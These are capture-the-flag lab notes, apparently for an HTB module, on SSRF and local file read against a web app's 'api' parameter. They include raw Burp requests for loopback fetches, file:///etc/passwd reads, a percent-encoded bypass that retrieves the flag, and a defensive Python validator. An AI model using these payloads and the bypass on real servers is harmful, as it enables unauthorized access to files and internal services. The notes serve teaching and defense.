SERVER-SIDE ATTACKS

OBJECTIVE: perform a security assessment of a client's web application, targeting back-end (server-side) vulnerabilities

Obtain the flag.
#identify potential back-end vulnerabilities - SSRF, SSTI, SSI Injection, XSLT Injection
root@htb:~$ BROWSER > http://83.136.248.42:44248
 * initial investigation:
    - no links to external sites found, only internal links back to the same page

#identification with Burp Suite
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 * after forwarding requests, the page reaches out to an 'external' site
   api=http://truckapi.htb/?id%3DFusionExpress01
    - test SSRF to manipulate the web application into sending unauthorized requests

BURP > Proxy > Intercept > Raw
 Request
  ...
  POST / HTTP/1.1
  Host: 83.136.248.42:44248
  Content-Length: 45
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Origin: http://83.136.248.42:44248
  Referer: http://83.136.248.42:44248/

  api=http://truckapi.htb/?id%3DFusionExpress01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST / HTTP/1.1
  Host: 83.136.248.42:44248
  Content-Length: 21
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Origin: http://83.136.248.42:44248
  Referer: http://83.136.248.42:44248/

  api=http://127.0.0.1/?id%3DFusionExpress01
   - SSRF validated: the server responded w/o error (HTTP 200) and reflected its own page back, i.e. the back-end fetched http://127.0.0.1 on our behalf

 Response
  ...
  HTTP 200 OK
  
#LFI:
Burp > Repeater 
 Request
  ...
  POST / HTTP/1.1
  api=file:///etc/passwd?id%3DFusionExpress01
  * Error (37): Couldn't open file /etc/passwd/
   - the file:// scheme reached the fetch layer (37 is curl's CURLE_FILE_COULDNT_READ_FILE), but note the trailing slash in the path it tried to open; the plain payload is being mangled before the fetch
  
#LFI: read the webapp source code - PHP
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=file:///var/www/html/index.php&date=2024-01-02
   - ALT: file:///var/www/html/config.php
  
#LFI: bypassing URL restrictions or access controls
 - URL-encode the scheme and path so a filter inspecting the raw parameter value never sees 'file://'; the back-end decodes the value before fetching it
BURP > Repeater
 Request
  ...
  POST / HTTP/1.1
  content-type: application/x-www-form-urlencoded
  api=file%3A%2F%2F%2Fetc%2Fpasswd?id%3DFusionExpress01
  
BURP > Repeater
 Request
  ...
  POST / HTTP/1.1
  api=file%3A%2F%2F%2Fflag.txt?id%3DFusionExpress01
  
  * HTB{3b8e2b940775e0267ce39d7c80488fc8}
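The three steps above (loopback SSRF, plain file:// LFI, and the percent-encoded bypass) all walk past a filter that inspects the raw parameter instead of the decoded URL. The following is an added defender-side example, not code from the lab or the HTB module: it contrasts a naive blocklist written against the raw string with a decode-then-allowlist check. The constructed inputs mirror the payloads in the notes; the `ALLOWED_HOSTS` set and the `naive_check` / `hardened_check` names are assumptions for illustration (`truckapi.htb` is the only upstream the page shows).

```python
"""Validating the 'api=<url>' parameter before the back-end fetches it.

Added example, not part of the original notes. Demonstrates why a blocklist
on the raw, still-encoded string fails and what a decode-then-allowlist check
looks like instead.
"""
import ipaddress
from urllib.parse import unquote, urlsplit

# Assumed allowlist: the only upstream the application legitimately calls.
ALLOWED_HOSTS = {"truckapi.htb"}
ALLOWED_SCHEMES = {"http", "https"}

# Constructed inputs mirroring the payloads shown in the notes above.
LEGIT = "http://truckapi.htb/?id%3DFusionExpress01"
LOOPBACK = "http://127.0.0.1/?id%3DFusionExpress01"
FILE_PLAIN = "file:///etc/passwd?id%3DFusionExpress01"
FILE_ENCODED = "file%3A%2F%2F%2Fetc%2Fpasswd?id%3DFusionExpress01"


def naive_check(raw_url: str) -> bool:
    """Blocklist as it is often (wrongly) written: looks at the raw string.
    'file%3A%2F%2F%2Fetc%2Fpasswd' contains neither 'file://' nor
    '127.0.0.1', so it passes, yet the fetch layer decodes it and opens
    /etc/passwd. Returns True when the URL is (wrongly) accepted."""
    lowered = raw_url.lower()
    return not (lowered.startswith("file://") or "127.0.0.1" in lowered)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (bounded), so single-
    or double-encoded payloads are judged in the form the fetcher will use."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def hardened_check(raw_url: str) -> bool:
    """Allowlist: decode, parse, then require an http(s) scheme and a host
    that is exactly one of the known upstreams. Any literal IP is rejected,
    which also covers loopback, RFC 1918 and link-local metadata addresses.
    Returns True only when the URL may be fetched."""
    parts = urlsplit(fully_decode(raw_url))
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False  # file://, gopher://, dict://, ... never reach the fetcher
    host = parts.hostname  # lower-cased, brackets stripped, userinfo removed
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False  # literal IPs such as 127.0.0.1, [::1], 169.254.169.254
    except ValueError:
        pass  # a hostname, not an IP literal
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    for label, url in [("legit", LEGIT), ("loopback", LOOPBACK),
                       ("file plain", FILE_PLAIN), ("file encoded", FILE_ENCODED)]:
        print(f"{label:13} naive={naive_check(url)!s:5} hardened={hardened_check(url)}")
```

Only the encoded payload splits the two checks: `naive_check` accepts it because the blocklist never sees a decoded scheme, while `hardened_check` rejects it along with the loopback and plain file:// cases. The allowlist also catches `http://truckapi.htb@127.0.0.1/`, since `urlsplit` strips the userinfo and exposes the real host.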
